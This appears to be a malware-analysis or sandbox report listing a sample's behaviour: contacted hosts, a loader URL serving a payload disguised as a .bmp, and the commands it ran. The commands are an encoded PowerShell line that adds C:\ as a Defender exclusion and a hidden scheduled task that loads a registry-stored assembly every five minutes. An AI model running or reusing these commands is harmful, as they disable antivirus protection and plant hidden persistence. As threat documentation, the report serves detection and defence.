Technical Information
- <SYSTEM32>\tasks\f18
- 'ta###grdev.com':80
- 'microsoft.com':80
- 'ha###.mine.nu':7000
- http://ta###grdev.com/loader/uploads/Rtmebgux_Hhbtcphm.bmp
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'ha###.mine.nu':7000
- DNS ASK ta###grdev.com
- DNS ASK microsoft.com
- DNS ASK ha###.mine.nu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F18 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F18\).F18).E...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F18 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F18\).F18).E...